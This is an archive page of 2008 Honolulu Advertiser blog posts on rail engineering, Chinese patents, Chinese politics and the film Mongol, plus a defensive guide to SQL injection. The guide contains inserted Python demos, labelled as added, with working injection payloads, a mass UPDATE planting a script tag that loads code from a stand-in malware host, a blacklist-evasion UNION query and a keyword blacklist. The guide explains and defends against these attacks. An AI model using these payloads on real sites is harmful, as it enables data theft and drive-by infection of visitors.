honoluluadvertiser.com

The Honolulu Advertiser

Archive for the ‘Uncategorized’ Category

The Engineering we will have to do for Rail

Sunday, August 24th, 2008

Here in Sim City, engineering is not one of our strong suits. I had the extraordinary experience of riding the “rail” bus with Cliff Slater and Mayoral Candidate and Engineer Panos Prevedouros on Saturday. I was so moved by the experience that I am driven to write about it.

First, going West from Ala Moana to Mapunapuna, Panos talked about the critical need to synchronize the traffic signals.  This is not high-tech.  He also showed us the path and capacity of the HOT lane he is proposing, which at some points in the downtown area is below the street, and that’s an interesting engineering and traffic management challenge. He is confident it can be done and that it will work.

But nothing compared to the engineering challenges we saw going East on the way back, where starting on Dillingham he gave us an engineering tour of the proposed rail line as it comes back into and through downtown and to Ala Moana Center and then terminates at the University.

We just followed the City’s map to see where the proposed line is supposed to be going, how high and wide it would be and where the stations were. It was a real eye-opener, a revelation for everyone on the tour. We had no idea of what is going to happen to our City.

Actually, you wouldn’t believe it. The rail is going to tear up and permanently reduce a number of streets and intersections. Where there are 4 lanes there will be two because of all the supporting structures and pylons they’ll have to build. You won’t be able to drive down those streets anymore – too narrow. Many of them will lose their sidewalks too.

Dillingham will be different and dark. Those stations are 200 feet long and 60 feet wide and over everything. The engineering will change those neighborhoods forever. The merchants at the stations will do fine, but those in the middle will be in no-man’s land. Lots of land will have to be condemned where the streets are less than 60 feet wide.

The rail, if you didn’t know it, doesn’t follow a straight path; it twists and turns in every direction. Since it is a railroad, these turns can’t be at 90 degrees; the train has to make large sweeping turns. The sharper the turn, the louder the squeal of the steel wheels. In any event, large areas will have to be condemned and demolished to accommodate the turns. It will cost a fortune – is this and the related litigation included in the price tag?

The line comes East on Nimitz, Halekawila, Queen and Waimanu Streets - these will have the rail overhead and will be forever lost in the shadows. I can only think of the elevated line in upper Manhattan, something that lower Manhattan would never tolerate these days. Depressing for retail, a magnet for crime. Are we going to love it?

The engineering really gets dicey around Ala Moana – the top of the station at Ala Moana climbs to 135 feet, a 13-storey building. The pylons will be frequent and formidable, and they will have to punch through all that concrete on the mauka side of Ala Moana Center on Kona Street. It will cost a fortune. Will General Growth agree or just say no?

To get to the Ala Moana station at 135 feet in the air, the train will have to climb at a 5 percent grade along Kona Street. That’s a very steep grade for a rail line – and as high as a roller coaster. Watch for vertigo. This will involve huge engineering issues. I suppose we’ll solve these problems as we go, and those lessons will be costly. I imagine we’ll have to import and pay for lots of engineering talent from the mainland.

Thence in a sharp left turn from Kona across Atkinson and then again right to pass over the all-ways intersection at the Convention Center, then down the middle of Kapiolani to University, then a left turn up University, past Date and ultimately across King to the University. All of this way above grade, dwarfing everything around it. The City will look like Frankenstein.

I haven’t gotten into exactly where the stations are, since looking at those locations as shown on the City map it was hard to imagine that the City would actually put them in the places shown. Sometimes they were way too far apart and sometimes much too bunched up. There were three within 1/2 mile, for example, near the University.

There’s more. I could go on, but never do the tour justice. Why don’t you contact honolulutraffic.com and see if you can get on the tour yourself and see what I mean.  Whatever your disposition, it’ll change the way you think.

Learning about Patents from China

Thursday, August 21st, 2008

Although China has established itself as manufacturer for the world, most of the products it manufactures are invented elsewhere, so the profit China has made in manufacturing goods has been relatively small.

This is changing.  The website for SIPO, China’s Intellectual Property Office (sipo.gov.cn) reports that patent filings in China have dramatically increased every year since 1985, when the Patent Law was enacted.  In 2006, 573,000 applications were filed and 268,000 were granted.

It’s no surprise that China’s leaders have been urging companies to be more innovative and to put more money into developing new IP.  That pitch must have worked, since China now generates the third highest number of patent applications, behind only Japan and the U.S.

Chinese inventors are also filing for international patents.  Of 156,000 patents filed with the World Intellectual Property Organization (WIPO) last year, 5,500 came from China.  This represents a 40% annual increase for China, now 7th worldwide.  The U.S. is still on top with 52,000, but China is competing vigorously, just as in the Olympics.

SQL Injection Attacks - how to deal with them

Saturday, August 16th, 2008

It’s not like SQL injection attacks are new.

They go back to at least late 2004, when they appeared in Europe and Asia (the technique itself was described publicly as early as 1998).  A German TV station was attacked, then a Taiwanese security magazine.  In 2006, Russian hackers broke into a Rhode Island government website and stole credit card data.

The attacks were proliferating.  In 2007, a hacker defaced the Microsoft UK website.  Later that year, the UN website was defaced with a SQL injection attack.  Have they no shame?

In January 2008, tens of thousands of websites were hit by automated SQL injection attacks that exploited injection flaws in ASP applications backed by Microsoft SQL Server.

In April 2008, the social security numbers of the sex offenders on the Sexual Offender Registry of Oklahoma were stolen by an injection attack.

In May 2008, a server farm in China used automated queries to Google’s search engine to identify SQL server websites that were vulnerable.

In July 2008, the Malaysian site for Kaspersky, a Russian computer security company, was hacked using a SQL injection.

From April 2008 to the present, SQL injection attacks against ASP applications running on Microsoft Internet Information Services and SQL Server have kept increasing.  The hole in each case is in the site’s own code, not in IIS or SQL Server themselves, which is why no patch from Microsoft closes it.

HOW THE INJECTION ATTACK WORKS

These attacks don’t require the hacker to have access to the server or, for that matter, to know the names of the tables and columns: the injected batch reads them out of the database’s own catalogue (sysobjects and syscolumns on SQL Server) and appends an HTML string to every text column of every table in a single request.  The string is a script tag that loads a malware JavaScript file from a remote location.  When that value is later displayed to a visitor of the hacked site, the visitor’s browser runs the script, which tries to exploit the browser or its plug-ins and take control of the visitor’s system.

The number of exploited web pages is estimated at 500,000 so far, and growing daily.  These attacks are across the board, against government sites as well as commercial sites, and the technique works against open-source databases as well as Microsoft SQL Server, though this particular mass attack was written in SQL Server’s T-SQL.  The injection itself is done by hand or by automated spiders; the script those injections load then attacks visitors through known vulnerabilities in popular software such as the QuickTime and RealPlayer browser plug-ins.

SQL is a rich and complex language, so there are many techniques by which the attack can be accomplished.  The common approach is for the hacker to tamper with a value taken from the browser’s URL query string or from a form field, which the website then concatenates into the SQL statement it sends to the database.

With this approach, hackers or their automated spiders can inject arbitrary instructions into the SQL commands written for the site, and these can do any number of awful things, like stealing all the data from the SQL database, destroying the database altogether, or modifying the records by adding references to remote malware that spreads the attack through innocent visitors using the site, a kind of drive-by Trojan horse.
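The pattern just described, as an added example that is not code from the original post: sqlite3 stands in for the site’s SQL Server, the product table and the malware.example hostname are constructed for the demonstration, and executescript() plays the part of a classic-ASP page handing a whole batch of statements to the database in one request. The same input is then passed through a parameterised query to show what changes.

```python
import sqlite3

# Constructed stand-ins: sqlite3 plays the site's SQL Server, and the tag
# points at a reserved example hostname rather than a real malware host.
SCRIPT_TAG = '<script src="http://malware.example/x.js"></script>'

def make_db():
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, blurb TEXT);
        INSERT INTO products (name, blurb) VALUES
            ('Ukulele', 'Koa wood, four strings'),
            ('Surfboard', 'Nine feet, single fin');
    """)
    return con

def search_vulnerable(con, term):
    """Classic ASP pattern: the querystring value is glued into the SQL text."""
    sql = "SELECT name FROM products WHERE name LIKE '%" + term + "%'"
    return [row[0] for row in con.execute(sql)]

def search_vulnerable_batch(con, term):
    """Same concatenation, but run through an API that accepts several
    statements at once, as ADO on classic ASP did.  A value that closes the
    quote, adds ';' and comments out the tail runs a second statement of the
    attacker's choosing against every row in the table."""
    sql = "SELECT name FROM products WHERE name LIKE '%" + term + "%'"
    con.executescript(sql)

def search_safe(con, term):
    """Parameterised: the value travels separately from the SQL text, so
    quotes and semicolons inside `term` are just characters to match."""
    sql = "SELECT name FROM products WHERE name LIKE '%' || ? || '%'"
    return [row[0] for row in con.execute(sql, (term,))]

DUMP_PAYLOAD = "' OR 1=1 --"                                   # read every row
MASS_PAYLOAD = "'; UPDATE products SET blurb = blurb || '" + SCRIPT_TAG + "'; --"

def infected_rows(con):
    """How many blurbs now carry the injected tag."""
    return sum(1 for (b,) in con.execute("SELECT blurb FROM products") if SCRIPT_TAG in b)

def demo():
    con = make_db()
    dumped = search_vulnerable(con, DUMP_PAYLOAD)      # whole catalogue leaks
    search_vulnerable_batch(con, MASS_PAYLOAD)         # every row gets the tag
    stamped = infected_rows(con)

    con = make_db()
    safe_dump = search_safe(con, DUMP_PAYLOAD)         # nothing matches the literal
    search_safe(con, MASS_PAYLOAD)                     # just another search term
    safe_stamped = infected_rows(con)
    legit = search_safe(con, "uku")                    # ordinary searches still work
    return {"dumped": dumped, "stamped": stamped, "safe_dump": safe_dump,
            "safe_stamped": safe_stamped, "legit": legit}

if __name__ == "__main__":
    print(demo())
```

The two vulnerable functions differ only in whether the driver accepts a batch; the first leaks the table with a single crafted value, the second rewrites every row. The parameterised version never parses the value as SQL, so both payloads are simply search strings that match nothing.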

HOW DO YOU KNOW YOU’VE BEEN HIT

Don’t think you’re somehow exempt.  If your site builds SQL statements by pasting user input into the query text, you’re vulnerable, whichever database you use.  Most websites are data-driven these days, and most of those use SQL in one form or another.  The hackers and their spiders may very well visit an attack on your site any time.

It goes without saying that you need to back up your SQL database, all of it, every day, and to keep those backups for longer than you used to.  If you keep 10 days of backups but don’t watch your site and 10 days go by, every backup you have will already contain the injected data and you’ll be out of luck.

How do you know you’ve been attacked?  The data on your screen is truncated, and you get strange characters like hanging apostrophes and angle brackets where database information ought to be.  Sometimes you get wise-guy jokes there too.  Look in the database itself for script tags hanging off the end of text fields, and look in the IIS logs for requests whose query string carries DECLARE, CAST and EXEC around a long 0x hexadecimal literal: that is the injected batch, and the log tells you when it first arrived.  Don’t open the injected script URLs in a browser – that is exactly how visitors’ machines get infected.

HOW TO DEAL WITH THEM

If you’ve been attacked, go to Internet Information Services (IIS) on your server, cut user connections, and stop the site.  Then find a good backup to restore your database from.  For that, you need to figure out when the attack happened (the web log is the place to look) so you can use a backup from before it.  If you don’t have a good backup, you’ll probably have to clean the database manually to recover the data for your site.

That means stripping out all the bad values and references that were injected.  You have to painstakingly go through every text field, record and table.  In a big database, this can take forever, and it’s tedious and gut-wrenching work.  Worse, it may not be a complete solution.  The attack appends its script tag to the end of each existing value; where the combined string no longer fits the column, the stored value is cut short, which is where the dangling angle brackets on your pages come from.  The original text is normally still there in front of the tag, so everything from the first injected “<script” onward has to go, and if a record was hit more than once you’ll find several tags stacked on the end of it.

When you’re done, turn IIS back on, check that you’ve done a good job, and look for anything else they left behind: the same hole let the attacker run whatever statements your site’s database login was allowed to run, not just the one you noticed.  You don’t really know until you bring the site up again and watch it work.

There are some scripts out there that claim to reverse the attack and clean the injected values out of your database. Here’s an example:

http://hackademix.net/2008/04/26/mass-attack-faq/#webdev

Different hackers inject different values, so there’s no guarantee that any one script will work.
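Both the log check described under “How do you know you’ve been hit” and the field-by-field cleanup above, as one added example that is not the script linked here nor code from the original post. The IIS log lines and the infected tables are constructed for the demonstration, sqlite3 stands in for SQL Server (its sqlite_master and PRAGMA table_info play the role of sysobjects and syscolumns), and malware.example is a reserved hostname.

```python
import re
import sqlite3
from urllib.parse import quote, unquote

# --- Spotting the batch in the IIS log ------------------------------------

# The 2008 mass attacks wrapped the real statement in a hex literal:
#   DECLARE @S VARCHAR(4000);SET @S=CAST(0x... AS VARCHAR(4000));EXEC(@S);--
# so a log search for UPDATE or <script finds nothing.  Decode the literal.
CAST_HEX = re.compile(r"CAST\(\s*0x([0-9A-Fa-f]+)\s+AS\s+N?VARCHAR", re.I)

def decode_hex_payload(hexdigits):
    data = bytes.fromhex(hexdigits)
    # NVARCHAR payloads are UTF-16LE: every second byte of ASCII text is NUL.
    if len(data) > 1 and data[1] == 0:
        return data.decode("utf-16-le", errors="replace")
    return data.decode("latin-1")

def scan_log(lines):
    """For W3C-format IIS lines (date time s-ip method uri-stem uri-query ...),
    return (uri-stem, decoded SQL) for each request carrying a hex batch."""
    hits = []
    for line in lines:
        fields = line.split()
        if len(fields) < 6:
            continue
        m = CAST_HEX.search(unquote(fields[5]))
        if m:
            hits.append((fields[4], decode_hex_payload(m.group(1))))
    return hits

# Constructed sample log.  INJECTED_SQL is the kind of statement the batch
# ran against every text column; the hostname is a reserved example name.
INJECTED_SQL = ("UPDATE products SET blurb=blurb+"
                "'<script src=\"http://malware.example/x.js\"></script>'")

def hex_batch(sql, nvarchar=False):
    raw = sql.encode("utf-16-le" if nvarchar else "latin-1")
    kind = "NVARCHAR" if nvarchar else "VARCHAR"
    batch = f"id=1;DECLARE @S {kind}(4000);SET @S=CAST(0x{raw.hex()} AS {kind}(4000));EXEC(@S);--"
    return quote(batch, safe="=;()@")          # logged URL-encoded, as received

def sample_log():
    head = "2008-05-13 02:15:11 10.0.0.5 GET"
    tail = "80 - 203.0.113.7 Mozilla/4.0 200 0 0"
    return [
        f"{head} /products.asp id=12 {tail}",                        # ordinary visit
        f"{head} /products.asp {hex_batch(INJECTED_SQL)} {tail}",    # VARCHAR batch
        f"{head} /news.asp {hex_batch(INJECTED_SQL, True)} {tail}",  # NVARCHAR batch
    ]

# --- Stripping the tags back out of the database ---------------------------

# A complete tag, or one cut short when the value outgrew its column.
SCRIPT_RE = re.compile(r"<script\b[^>]*>.*?</script>|<script\b.*", re.I | re.S)

def strip_injected_scripts(con):
    """Walk every text column of every table (the attack walked the same
    catalogue) and cut the appended tags off.  Table and column names come
    from the schema, never from users.  Returns the number of cells rewritten."""
    cleaned = 0
    tables = con.execute("SELECT name FROM sqlite_master WHERE type='table'").fetchall()
    for (table,) in tables:
        for col in con.execute(f'PRAGMA table_info("{table}")').fetchall():
            name, declared = col[1], (col[2] or "").upper()
            if "CHAR" not in declared and "TEXT" not in declared:
                continue
            rows = con.execute(f"""SELECT rowid, "{name}" FROM "{table}"
                                   WHERE "{name}" LIKE '%<script%'""").fetchall()
            for rowid, value in rows:
                fixed = SCRIPT_RE.sub("", value)
                if fixed != value:
                    con.execute(f'UPDATE "{table}" SET "{name}"=? WHERE rowid=?', (fixed, rowid))
                    cleaned += 1
    con.commit()
    return cleaned

TAG = '<script src="http://malware.example/x.js"></script>'

def infected_db():
    """Constructed: a site database after the attack ran, twice on one row."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, blurb VARCHAR(120));
        CREATE TABLE news (id INTEGER PRIMARY KEY, headline TEXT, body TEXT);
        INSERT INTO news (headline, body) VALUES ('Aloha', 'Nothing injected here');
    """)
    con.executemany("INSERT INTO products (name, blurb) VALUES (?, ?)", [
        ("Ukulele" + TAG, "Koa wood" + TAG + TAG),
        ("Surfboard", 'Nine feet, single fin<script src="http://malw'),   # truncated
    ])
    return con

def demo():
    hits = scan_log(sample_log())
    con = infected_db()
    cleaned = strip_injected_scripts(con)
    products = con.execute("SELECT name, blurb FROM products ORDER BY id").fetchall()
    return {"hits": hits, "cleaned": cleaned, "products": products}

if __name__ == "__main__":
    for stem, sql in demo()["hits"]:
        print(stem, "->", sql)
```

Decoding the hex literal is what turns a log line into evidence: it shows exactly which statement ran and when, which fixes the date you need to pick a clean backup. The cleanup is a triage step, not a substitute for that backup; it cannot tell a legitimate “<script” from an injected one, and it does nothing about anything else the batch may have done.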

Even assuming you can restore your database, you can be hit again at any time with the same result, until the hole is closed.  So if you have a good backup file of your database, make a protected copy of it for future use if necessary.

CLOSING THE VULNERABILITIES

Beyond that, you or your web designers need to close the vulnerabilities.  You can do that in a variety of ways, all of which involve new coding.  Go slowly and carefully, file by file, so you do it right and don’t miss anything.

When you recode, don’t try to “clean” the parameters by stripping suspicious words out of them.  Lists like DECLARE, SELECT, SET, CAST, DROP, EXEC, ”;”, “–”, INSERT, DELETE, XP_, VARCHAR and CHAR are what most people reach for, and they fail in two ways: the filter mangles legitimate data (a customer named Castillo loses four letters to the CAST rule, and so does every “forecast”), and attackers step around it, for instance by writing a keyword twice so that one removal pass leaves it intact, or by encoding the whole statement as a hex literal so that nothing but a CAST and an EXEC is visible, which is exactly what the 2008 mass attacks did.  The fix that actually closes the hole is to stop building SQL text out of user input: use parameterized queries (ADO Command objects with Parameters on classic ASP, SqlParameter in ASP.NET) or stored procedures called with parameters, so the database receives the value separately from the statement and never parses it as SQL.  Back that up by giving the site’s database login only the rights its pages need (a site that only reads its catalogue has no business running UPDATE against every table), and HTML-encode data on the way out so that a stray tag in the database cannot run in a visitor’s browser.
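The keyword-stripping filter from the paragraph above, written out so its two failure modes can be seen, as an added example that is not code from the original post. The product and user tables are constructed, sqlite3 stands in for SQL Server, and the password hash is the well-known MD5 of “password”, used as sample data only.

```python
import re
import sqlite3

# The blacklist from the text, applied as the usual single-pass filter.
BLACKLIST = ["DECLARE", "SELECT", "SET", "CAST", "DROP", "EXEC", ";", "--",
             "INSERT", "DELETE", "XP_", "VARCHAR", "CHAR"]

def strip_keywords(value):
    """One pass over the blacklist; each keyword is removed wherever it occurs."""
    for word in BLACKLIST:
        value = re.sub(re.escape(word), "", value, flags=re.I)
    return value

def make_db():
    # Constructed sample data: a catalogue plus a users table worth stealing.
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE products (name TEXT);
        INSERT INTO products VALUES ('Ukulele'), ('Surfboard');
        CREATE TABLE users (login TEXT, pwd_hash TEXT);
        INSERT INTO users VALUES ('admin', '5f4dcc3b5aa765d61d8327deb882cf99');
    """)
    return con

def search_filtered(con, term):
    """Still concatenates; relies on strip_keywords() for protection."""
    sql = "SELECT name FROM products WHERE name LIKE '%" + strip_keywords(term) + "%'"
    return sorted(row[0] for row in con.execute(sql))

def search_parameterised(con, term):
    """Binds the value instead; nothing in `term` is ever parsed as SQL."""
    sql = "SELECT name FROM products WHERE name LIKE '%' || ? || '%'"
    return sorted(row[0] for row in con.execute(sql, (term,)))

# A doubled keyword survives a single removal pass: SEL|SELECT|ECT -> SELECT.
# The trailing 'a' LIKE 'a reuses the query's own closing quote, so the
# blacklisted comment marker is never needed.
EVASION = "' UNION SELSELECTECT pwd_hash FROM users WHERE 'a' LIKE 'a"

def demo():
    con = make_db()
    return {
        "filtered_payload": strip_keywords(EVASION),        # a clean UNION SELECT
        "leaked": search_filtered(con, EVASION),            # hash comes back as a "product"
        "parameterised": search_parameterised(con, EVASION),  # nothing matches
        "mangled": [strip_keywords(s) for s in ("Charles Castillo", "Sunset Beach")],
    }

if __name__ == "__main__":
    print(demo())
```

The filter lets the password hash out through the front page and, at the same time, turns “Charles Castillo” into “les illo” and “Sunset Beach” into “Sun Beach” before they are ever stored. The parameterised query needs no filter at all.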

Recoding every query is tedious for a website of any size, but it is the only fix that sticks, and it beats doing the whole cleanup again.  There are also other things you can do to make your code less vulnerable.  Here are a couple of links that will help you understand what needs to be done.

www.f-secure.com/weblog/archives/00001427.html

www.sitepoint.com/article/794

www.wwwcoder.com/main/parentid/258/site/2966/68/default.aspx

www.imperva.com/application_defense_center/white_papers/sql_injection_signatures_evasion.html

There are some programs that claim to identify your vulnerability to SQL injection attacks.  One is the Acunetix Scanner, used by a great number of U.S. and foreign companies and government agencies.  I guess it must be of some value.  Check it at www.acunetix.com.

There are books that can help.  See O’Reilly’s SQL Hacks by Andrew Cumming and Gordon Russell available at Amazon and Barnes and Noble.

WILL WE EVER CATCH THESE GUYS

This global proliferation of SQL injection attacks is not only irritating, it’s scary in that it has the ability bring sites down all over the world.  It’s time for Microsoft to catch up.  It’s also time for world police authorities to catch up, and get serious.  This isn’t child’s play any more.

China Rising: The Flip Side of e-Draconianism

Sunday, July 6th, 2008

China’s central government is making itself downright unpopular these days.  Cyberspies against the blogs?  Emptying dormitories to prevent student demonstrations?  Repressing news of earthquake failures?  Pushing Tibet to the limit, then publishing a list of dos and don’ts telling tourists they could be arrested for wearing Free Tibet t-shirts. Disbarring a lawyer who agreed to represent a Tibetan?  You’re kidding.

While we have certainly admired China’s remarkable tech and business success, the notions of personal freedom and representative government still seem tenuous, and recent Tiananmen tactics attempting to sterilize things for the Games show us that the government still doesn’t get it.

They may think they can beat off the real mood of China, but it looks like other forces are in play.  E-Democracy is on the rise and there’s not that much the repressors can do about it.  Given the way the Chinese have e-Connected with the world, and with themselves, I suggest that they are more likely to take new risks to achieve Western liberties these days.

China rising is also China rising in the rule of law.  Sure, the government can take steps to cauterize unpleasantness and head off bad press, but the genie is out of the bottle.  Given the e-Infrastructure already in place, the government cannot control, and is not exempt from, the will of the people.  After all, this is the 21st Century and tech is everybody’s genie.

Watch what happens in August.  Through the Internet, Smart Mobs are also rising in China.

Mongol - another Asian blockbuster

Sunday, July 6th, 2008

The point, which I first noticed in House of the Flying Daggers, is that movies aren’t limited to Hollywood or the U.S. or even Europe anymore.  China has shown that it can make world class movies, and now Russia, probably with a lot of help from China, can do likewise.  If successful movie recipes were proprietary, they aren’t any more.

Enter Mongol, the story of Genghis Khan’s rise to power and Mongolia’s rise to empire.  Genghis Khan was one of the most powerful men that ever lived, and the movie is a study in that power.  It was directed by Russian Sergei Bodrov, who studied Genghis Khan and Mongolia in depth.  These are things we don’t know much about, and they are fertile ground for a movie this big.  Remember, the Mongols ruled Russia for 200 years.

An international Asian cast.  They went all over the world for casting.  They found Japanese actor Tadanobu Asano (who recently starred in a Zatoichi movie – the blind swordsman) to play Temudgin, that is, Genghis Khan.

And sassy Khulan Chuluun, Temudgin’s wife, a complete knockout, in a love partnership that would be extraordinary in any age, much less the 12th century.  This Mongolian actress was freshly discovered for the movie, and had never acted before.

Temudgin’s blood brother later turned blood enemy is Jamukha, played by Chinese actor Honglei Sun, from The Road Home, an early Zhang Yimou, Ziyi Zhang movie.  A powerful and charming character.

Everyone else in the movie is played by a Mongolian, and they are a handsome people.

The crew was 600 and the cast was 1,000, since they had battles to do.  And you’ve never seen battles quite like this.  Don’t fool with the Mongols.  Shot in the most incredible scenery in really remote locations in China, Mongolia and Kazakhstan (like 12 hours by car on rudimentary roads from the nearest towns).  Similar to the scenery in Daggers, with open spaces as far as the eye can see, captured in eye-popping cinematography.

This is not an American movie, although I suspect there is some American money, technology and technical expertise in here.  Mongol has been nominated for an academy award.  The credits read something like Daggers, international but mostly Asian, and you can see that they spared no expense in their efforts.

Bodrov was culturally sensitive, as one should be for a movie like this.  He went to visit the chief shaman of Mongolia in Ulan Bator to ask permission to make the movie.  The shaman granted the request, and was appreciative that Bodrov had asked.  Good move.

You can touch the city scenes, the costumes, the textures.  This movie takes you back to that time, making you wonder how it would be to live among them, making you compare your life to theirs.  It’s transporting.  The music, filled out by musicians Bodrov found in Mongolia, is haunting and exotic, a huge factor in bringing you back there.

The movie is entirely in Mongolian (Temudgin says it’s the most beautiful language in the world) and there are subtitles. But that doesn’t slow it down for a minute.  It engages you completely from the onset and throughout.  I walked out wishing there was more – feeling cheated out of the further history that followed Temudgin’s rise to power.

Can you remember the last time you saw a Russian movie?  Not me.  And yet here it is bursting onto the international screen with everything you would want.  This is a movie that will keep you at the edge of your seat throughout, from Mongolian history to horrific violence to larger than life characters, and back again.  It’s fast, and it’s furious.

Movies are one of the great cultural experiences of our lives, and they are becoming completely global.  Distance and language aren’t barriers anymore.  What a great time to be alive, to be able to experience a movie like this.  It’s great to learn how these people lived in the 12th century (life was tough and short), but it’s even better to be able to watch it all unfold with Dolby 900 years later.

This one will play everywhere.